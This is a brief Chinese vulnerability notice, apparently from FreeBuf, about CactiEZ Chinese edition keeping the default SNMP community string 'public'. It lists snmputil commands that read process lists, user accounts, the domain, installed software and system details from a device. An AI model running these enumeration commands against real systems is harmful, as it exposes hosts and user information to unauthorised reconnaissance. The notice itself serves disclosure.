CactiEZ 中文版snmp默认团体名漏洞

CactiEZ 中文版，是一款监控控制系统；其中默认的snmp设置public，没有修改导致可以远程读取目标设备主机信息。

如：

snmputil.exe walk 127.0.0.1 public .1.3.6.1.2.1.25.4.2.1.2   //**进程列表

snmputil.exe walk 127.0.0.1 public .1.3.6.1.4.77.1.2.25.1.1   //**用户列表

snmputil.exe get 127.0.0.1 public .1.3.6.1.4.77.1.4.1.0   //**域名

snmputil.exe walk 127.0.0.1 public .1.3.6.1.2.1.25.6.3.1.2   //**安装的软件

snmputil.exe walk 127.0.0.1 public .1.3.6.1.2.1.1   //**系统信息

 转载请注明转自: FreebuF.COM